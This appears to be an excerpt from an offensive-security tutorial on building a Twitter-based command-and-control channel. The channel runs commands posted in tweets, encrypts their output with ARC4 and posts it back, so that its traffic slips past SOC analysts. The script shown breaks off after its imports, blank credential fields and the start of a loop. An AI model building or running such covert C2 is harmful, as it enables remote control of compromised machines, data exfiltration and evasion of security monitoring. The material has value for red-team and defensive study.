Creating an Twitter C2
Up to a certain point, requesting random pages on the Internet is passable but once a Security Operation Centre (SOC) analyst takes a closer look at all the data that's vanishing up the tubes, it's going to be obvious that the requests are going to a dodgy site and therefore are likely associated with malicious traffic. Fortunately, social media helps out in this regard and allows us to hide data in plain sight.
We will create a script that connects to Twitter, reads tweets, performs commands based on those tweets, encrypts the response data, and posts it to Twitter. We'll also make a decode script.
Getting Started
For this, you will need a Twitter account with an API key.
How to do it…
The script we will be using is as follows:
from twitter import * import os from Crypto.Cipher import ARC4 import subprocess import time token = '' token_key = '' con_secret = '' con_secret_key = '' t = Twitter(auth=OAuth(token, token_key, con_secret, con_secret_key)) while 1: user = t...
